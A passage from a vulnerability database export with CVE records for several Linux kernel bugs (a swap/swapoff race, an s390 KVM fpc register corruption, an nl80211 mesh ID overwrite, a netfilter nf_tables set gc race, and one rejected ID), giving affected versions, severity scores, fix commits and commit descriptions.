"programFiles": [
"mm/swapfile.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: swap: fix race between free_swap_and_cache() and swapoff()\n\nThere was previously a theoretical window where swapoff() could run and\nteardown a swap_info_struct while a call to free_swap_and_cache() was\nrunning in another thread. This could cause, amongst other bad\npossibilities, swap_page_trans_huge_swapped() (called by\nfree_swap_and_cache()) to access the freed memory for swap_map.\n\nThis is a theoretical problem and I haven\u0027t been able to provoke it from a\ntest case. But there has been agreement based on code review that this is\npossible (see link below).\n\nFix it by using get_swap_device()/put_swap_device(), which will stall\nswapoff(). There was an extra check in _swap_info_get() to confirm that\nthe swap entry was not free. This isn\u0027t present in get_swap_device()\nbecause it doesn\u0027t make sense in general due to the race between getting\nthe reference and swapoff. So I\u0027ve added an equivalent check directly in\nfree_swap_and_cache().\n\nDetails of how to provoke one possible issue (thanks to David Hildenbrand\nfor deriving this):\n\n--8\u003c-----\n\n__swap_entry_free() might be the last user and result in\n\"count == SWAP_HAS_CACHE\".\n\nswapoff-\u003etry_to_unuse() will stop as soon as soon as si-\u003einuse_pages==0.\n\nSo the question is: could someone reclaim the folio and turn\nsi-\u003einuse_pages==0, before we completed swap_page_trans_huge_swapped().\n\nImagine the following: 2 MiB folio in the swapcache. Only 2 subpages are\nstill references by swap entries.\n\nProcess 1 still references subpage 0 via swap entry.\nProcess 2 still references subpage 1 via swap entry.\n\nProcess 1 quits. Calls free_swap_and_cache().\n-\u003e count == SWAP_HAS_CACHE\n[then, preempted in the hypervisor etc.]\n\nProcess 2 quits. Calls free_swap_and_cache().\n-\u003e count == SWAP_HAS_CACHE\n\nProcess 2 goes ahead, passes swap_page_trans_huge_swapped(), and calls\n__try_to_reclaim_swap().\n\n__try_to_reclaim_swap()-\u003efolio_free_swap()-\u003edelete_from_swap_cache()-\u003e\nput_swap_folio()-\u003efree_swap_slot()-\u003eswapcache_free_entries()-\u003e\nswap_entry_free()-\u003eswap_range_free()-\u003e\n...\nWRITE_ONCE(si-\u003einuse_pages, si-\u003einuse_pages - nr_entries);\n\nWhat stops swapoff to succeed after process 2 reclaimed the swap cache\nbut before process1 finished its call to swap_page_trans_huge_swapped()?\n\n--8\u003c-----"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:51.074Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d85c11c97ecf92d47a4b29e3faca714dc1f18d0d"
},
{
"url": "https://git.kernel.org/stable/c/2da5568ee222ce0541bfe446a07998f92ed1643e"
},
{
"url": "https://git.kernel.org/stable/c/1ede7f1d7eed1738d1b9333fd1e152ccb450b86a"
},
{
"url": "https://git.kernel.org/stable/c/0f98f6d2fb5fad00f8299b84b85b6bc1b6d7d19a"
},
{
"url": "https://git.kernel.org/stable/c/3ce4c4c653e4e478ecb15d3c88e690f12cbf6b39"
},
{
"url": "https://git.kernel.org/stable/c/363d17e7f7907c8e27a9e86968af0eaa2301787b"
},
{
"url": "https://git.kernel.org/stable/c/82b1c07a0af603e3c47b906c8e991dc96f01688e"
}
],
"title": "mm: swap: fix race between free_swap_and_cache() and swapoff()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26960",
"datePublished": "2024-05-01T05:19:12.112Z",
"dateReserved": "2024-02-19T14:20:24.201Z",
"dateUpdated": "2025-05-04T09:00:51.074Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52597 (GCVE-0-2023-52597)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-21 08:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: fix setting of fpc register
kvm_arch_vcpu_ioctl_set_fpu() allows to set the floating point control
(fpc) register of a guest cpu. The new value is tested for validity by
temporarily loading it into the fpc register.
This may lead to corruption of the fpc register of the host process:
if an interrupt happens while the value is temporarily loaded into the fpc
register, and within interrupt context floating point or vector registers
are used, the current fp/vx registers are saved with save_fpu_regs()
assuming they belong to user space and will be loaded into fp/vx registers
when returning to user space.
test_fp_ctl() restores the original user space / host process fpc register
value, however it will be discarded, when returning to user space.
In result the host process will incorrectly continue to run with the value
that was supposed to be used for a guest cpu.
Fix this by simply removing the test. There is another test right before
the SIE context is entered which will handles invalid values.
This results in a change of behaviour: invalid values will now be accepted
instead of that the ioctl fails with -EINVAL. This seems to be acceptable,
given that this interface is most likely not used anymore, and this is in
addition the same behaviour implemented with the memory mapped interface
(replace invalid values with zero) - see sync_regs() in kvm-s390.c.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4725c86055f5bbdcdfe47199c0715881893a2c79 Version: 4725c86055f5bbdcdfe47199c0715881893a2c79 Version: 4725c86055f5bbdcdfe47199c0715881893a2c79 Version: 4725c86055f5bbdcdfe47199c0715881893a2c79 Version: 4725c86055f5bbdcdfe47199c0715881893a2c79 Version: 4725c86055f5bbdcdfe47199c0715881893a2c79 Version: 4725c86055f5bbdcdfe47199c0715881893a2c79 Version: 4725c86055f5bbdcdfe47199c0715881893a2c79 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52597",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T15:59:20.673242Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-07T17:29:59.971Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.131Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a04410b0bc7e056e0843ac598825dd359246d18"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5e63c9ae8055109d805aacdaf2a4fe2c3b371ba1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/150a3a3871490e8c454ffbac2e60abeafcecff99"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/732a3bea7aba5b15026ea42d14953c3425cc7dc2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0671f42a9c1084db10d68ac347d08dbf6689ecb3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c87d7d910775a025e230fd6359b60627e392460f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2823db0010c400e4b2b12d02aa5d0d3ecb15d7c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b988b1bb0053c0dcd26187d29ef07566a565cf55"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/s390/kvm/kvm-s390.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3a04410b0bc7e056e0843ac598825dd359246d18",
"status": "affected",
"version": "4725c86055f5bbdcdfe47199c0715881893a2c79",
"versionType": "git"
},
{
"lessThan": "5e63c9ae8055109d805aacdaf2a4fe2c3b371ba1",
"status": "affected",
"version": "4725c86055f5bbdcdfe47199c0715881893a2c79",
"versionType": "git"
},
{
"lessThan": "150a3a3871490e8c454ffbac2e60abeafcecff99",
"status": "affected",
"version": "4725c86055f5bbdcdfe47199c0715881893a2c79",
"versionType": "git"
},
{
"lessThan": "732a3bea7aba5b15026ea42d14953c3425cc7dc2",
"status": "affected",
"version": "4725c86055f5bbdcdfe47199c0715881893a2c79",
"versionType": "git"
},
{
"lessThan": "0671f42a9c1084db10d68ac347d08dbf6689ecb3",
"status": "affected",
"version": "4725c86055f5bbdcdfe47199c0715881893a2c79",
"versionType": "git"
},
{
"lessThan": "c87d7d910775a025e230fd6359b60627e392460f",
"status": "affected",
"version": "4725c86055f5bbdcdfe47199c0715881893a2c79",
"versionType": "git"
},
{
"lessThan": "2823db0010c400e4b2b12d02aa5d0d3ecb15d7c7",
"status": "affected",
"version": "4725c86055f5bbdcdfe47199c0715881893a2c79",
"versionType": "git"
},
{
"lessThan": "b988b1bb0053c0dcd26187d29ef07566a565cf55",
"status": "affected",
"version": "4725c86055f5bbdcdfe47199c0715881893a2c79",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/s390/kvm/kvm-s390.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.13"
},
{
"lessThan": "3.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: s390: fix setting of fpc register\n\nkvm_arch_vcpu_ioctl_set_fpu() allows to set the floating point control\n(fpc) register of a guest cpu. The new value is tested for validity by\ntemporarily loading it into the fpc register.\n\nThis may lead to corruption of the fpc register of the host process:\nif an interrupt happens while the value is temporarily loaded into the fpc\nregister, and within interrupt context floating point or vector registers\nare used, the current fp/vx registers are saved with save_fpu_regs()\nassuming they belong to user space and will be loaded into fp/vx registers\nwhen returning to user space.\n\ntest_fp_ctl() restores the original user space / host process fpc register\nvalue, however it will be discarded, when returning to user space.\n\nIn result the host process will incorrectly continue to run with the value\nthat was supposed to be used for a guest cpu.\n\nFix this by simply removing the test. There is another test right before\nthe SIE context is entered which will handles invalid values.\n\nThis results in a change of behaviour: invalid values will now be accepted\ninstead of that the ioctl fails with -EINVAL. This seems to be acceptable,\ngiven that this interface is most likely not used anymore, and this is in\naddition the same behaviour implemented with the memory mapped interface\n(replace invalid values with zero) - see sync_regs() in kvm-s390.c."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:49:47.560Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3a04410b0bc7e056e0843ac598825dd359246d18"
},
{
"url": "https://git.kernel.org/stable/c/5e63c9ae8055109d805aacdaf2a4fe2c3b371ba1"
},
{
"url": "https://git.kernel.org/stable/c/150a3a3871490e8c454ffbac2e60abeafcecff99"
},
{
"url": "https://git.kernel.org/stable/c/732a3bea7aba5b15026ea42d14953c3425cc7dc2"
},
{
"url": "https://git.kernel.org/stable/c/0671f42a9c1084db10d68ac347d08dbf6689ecb3"
},
{
"url": "https://git.kernel.org/stable/c/c87d7d910775a025e230fd6359b60627e392460f"
},
{
"url": "https://git.kernel.org/stable/c/2823db0010c400e4b2b12d02aa5d0d3ecb15d7c7"
},
{
"url": "https://git.kernel.org/stable/c/b988b1bb0053c0dcd26187d29ef07566a565cf55"
}
],
"title": "KVM: s390: fix setting of fpc register",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52597",
"datePublished": "2024-03-06T06:45:26.608Z",
"dateReserved": "2024-03-02T21:55:42.572Z",
"dateUpdated": "2025-05-21T08:49:47.560Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26848 (GCVE-0-2024-26848)
Vulnerability from cvelistv5
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2024-12-19T15:16:32.263Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"rejectedReasons": [
{
"lang": "en",
"value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26848",
"datePublished": "2024-04-17T10:14:19.546Z",
"dateRejected": "2024-12-19T15:16:32.263Z",
"dateReserved": "2024-02-19T14:20:24.182Z",
"dateUpdated": "2024-12-19T15:16:32.263Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27410 (GCVE-0-2024-27410)
Vulnerability from cvelistv5
Published
2024-05-17 11:50
Modified
2025-06-19 12:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: nl80211: reject iftype change with mesh ID change
It's currently possible to change the mesh ID when the
interface isn't yet in mesh mode, at the same time as
changing it into mesh mode. This leads to an overwrite
of data in the wdev->u union for the interface type it
currently has, causing cfg80211_change_iface() to do
wrong things when switching.
We could probably allow setting an interface to mesh
while setting the mesh ID at the same time by doing a
different order of operations here, but realistically
there's no userspace that's going to do this, so just
disallow changes in iftype when setting mesh ID.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27410",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:39:36.191312Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:43:50.161Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.357Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d38d31bbbb9dc0d4d71a45431eafba03d0bc150d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0cfbb26ee5e7b3d6483a73883f9f6157bca22ec9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/99eb2159680af8786104dac80528acd5acd45980"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/063715c33b4c37587aeca2c83cf08ead0c542995"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/930e826962d9f01dcd2220176134427358d112f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/177d574be4b58f832354ab1ef5a297aa0c9aa2df"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2add961a5ed25cfd6a74f9ffb9e7ab6d6ded838"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f78c1375339a291cba492a70eaf12ec501d28a8e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/wireless/nl80211.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "930e826962d9f01dcd2220176134427358d112f2",
"status": "affected",
"version": "7b0a0e3c3a88260b6fcb017e49f198463aa62ed1",
"versionType": "git"
},
{
"lessThan": "177d574be4b58f832354ab1ef5a297aa0c9aa2df",
"status": "affected",
"version": "7b0a0e3c3a88260b6fcb017e49f198463aa62ed1",
"versionType": "git"
},
{
"lessThan": "a2add961a5ed25cfd6a74f9ffb9e7ab6d6ded838",
"status": "affected",
"version": "7b0a0e3c3a88260b6fcb017e49f198463aa62ed1",
"versionType": "git"
},
{
"lessThan": "f78c1375339a291cba492a70eaf12ec501d28a8e",
"status": "affected",
"version": "7b0a0e3c3a88260b6fcb017e49f198463aa62ed1",
"versionType": "git"
},
{
"status": "affected",
"version": "7a53ad13c09150076b7ddde96c2dfc5622c90b45",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/wireless/nl80211.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.19.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: nl80211: reject iftype change with mesh ID change\n\nIt\u0027s currently possible to change the mesh ID when the\ninterface isn\u0027t yet in mesh mode, at the same time as\nchanging it into mesh mode. This leads to an overwrite\nof data in the wdev-\u003eu union for the interface type it\ncurrently has, causing cfg80211_change_iface() to do\nwrong things when switching.\n\nWe could probably allow setting an interface to mesh\nwhile setting the mesh ID at the same time by doing a\ndifferent order of operations here, but realistically\nthere\u0027s no userspace that\u0027s going to do this, so just\ndisallow changes in iftype when setting mesh ID."
}
],
"providerMetadata": {
"dateUpdated": "2025-06-19T12:39:17.711Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/930e826962d9f01dcd2220176134427358d112f2"
},
{
"url": "https://git.kernel.org/stable/c/177d574be4b58f832354ab1ef5a297aa0c9aa2df"
},
{
"url": "https://git.kernel.org/stable/c/a2add961a5ed25cfd6a74f9ffb9e7ab6d6ded838"
},
{
"url": "https://git.kernel.org/stable/c/f78c1375339a291cba492a70eaf12ec501d28a8e"
}
],
"title": "wifi: nl80211: reject iftype change with mesh ID change",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27410",
"datePublished": "2024-05-17T11:50:43.212Z",
"dateReserved": "2024-02-25T13:47:42.682Z",
"dateUpdated": "2025-06-19T12:39:17.711Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26643 (GCVE-0-2024-26643)
Vulnerability from cvelistv5
Published
2024-03-21 10:43
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout
While the rhashtable set gc runs asynchronously, a race allows it to
collect elements from anonymous sets with timeouts while it is being
released from the commit path.
Mingi Cho originally reported this issue in a different path in 6.1.x
with a pipapo set with low timeouts which is not possible upstream since
7395dfacfff6 ("netfilter: nf_tables: use timestamp to check for set
element timeout").
Fix this by setting on the dead flag for anonymous sets to skip async gc
in this case.
According to 08e4c8c5919f ("netfilter: nf_tables: mark newset as dead on
transaction abort"), Florian plans to accelerate abort path by releasing
objects via workqueue, therefore, this sets on the dead flag for abort
path too.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8da1b048f9a501d3d7d38c188ba09d7d0d5b8c27 Version: bbdb3b65aa91aa0a32b212f27780b28987f2d94f Version: 448be0774882f95a74fa5eb7519761152add601b Version: d19e8bf3ea4114dd21fc35da21f398203d7f7df1 Version: ea3eb9f2192e4fc33b795673e56c97a21987f868 Version: 5f68718b34a531a556f2f50300ead2862278da26 Version: 5f68718b34a531a556f2f50300ead2862278da26 Version: 5f68718b34a531a556f2f50300ead2862278da26 Version: 0624f190b5742a1527cd938295caa8dc5281d4cd |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26643",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:08:32.631906Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T16:08:41.862Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.747Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d75a589bb92af1abf3b779cfcd1977ca11b27033"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/edcf1a3f182ecf8b6b805f0ce90570ea98c5f6bf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e2d45f467096e931044f0ab7634499879d851a5c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/291cca35818bd52a407bc37ab45a15816039e363"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/406b0241d0eb598a0b330ab20ae325537d8d8163"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b2d6f9a5b1cf968f1eaa71085ceeb09c2cb276b1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5224afbc30c3ca9ba23e752f0f138729b2c48dd8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/552705a3650bbf46a22b1adedc1b04181490fc36"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d75a589bb92af1abf3b779cfcd1977ca11b27033",
"status": "affected",
"version": "8da1b048f9a501d3d7d38c188ba09d7d0d5b8c27",
"versionType": "git"
},
{
"lessThan": "edcf1a3f182ecf8b6b805f0ce90570ea98c5f6bf",
